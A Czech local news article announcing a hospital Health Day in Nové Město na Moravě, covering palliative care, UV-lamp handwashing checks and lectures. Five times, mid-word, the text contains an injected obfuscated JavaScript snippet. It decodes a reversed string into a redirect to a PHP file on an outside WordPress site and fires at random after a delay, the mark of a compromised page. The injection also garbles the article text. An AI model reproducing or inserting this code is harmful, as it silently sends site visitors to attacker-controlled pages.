Rainbow page separator

Při Dni zdraví lidé pod UV lampou uvidí, jak si umyli ruce

Středa, 27. března 2019

Nové Měs[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na Moravě / Tématem le[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tošního Dne zdraví, který novoměstská nemocnice chystá na úterý 16. dubna, je kvalita života u nevyléčitelně nemocných pacientů a paliativní péče. Akce, která se uskuteční v době od 10 do 15 hodin, bude rozdělena do dvou bloků. První z nich se odehraje v přízemí chirurgického pavilonu, druhý v zasedací místnosti pod heliportem. „V recepci se zájemci budou moci zeptat, na jaké služby má dlouhodobě nebo nevyléčitelně nemocný pacient nárok a kde mu je poskytnou,“ sdělila mluvčí nemocnice Tamara Pecková. Návštěvníky čeká i prohlídka zdravotnických pomůcek, lékárna nabídne ochutnávku nutridrinků a také pětiprocentní slevu na volně prodejné přípravky. Své služby budou prezen[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovat Oblastní charita Žďár nad Sázavou a Domácí hospic Vysočina.
Zajímavosti bude i kontrola správné hygieny rukou pod UV lampou. „Prohlédnout si ruce pod UV lampou je vždy velmi atraktivní. Umět si správně mýt ruce je velmi důležité nejen pro zdravotníky, ale také pro veřejnost,“ poznamenala epidemioložka nemocnice Šárka Vidergo[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tová.
V zasedačce pod heliportem se odehrají přednášky, a [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to v 10 a ve 14 hodin. „Téma jedné z nich bude prevence dekubitů v domácí péči, představíme také paliativní péči, na jejíž rozjezd nemocnice získala od nadačního fondu Avast dva miliony korun. Přednášku s krátkým kvizem připravuje primář onkologie a o své práci budou mluvit zástupci charity a Domácího hospice Vysočina,“ dodala mluvčí.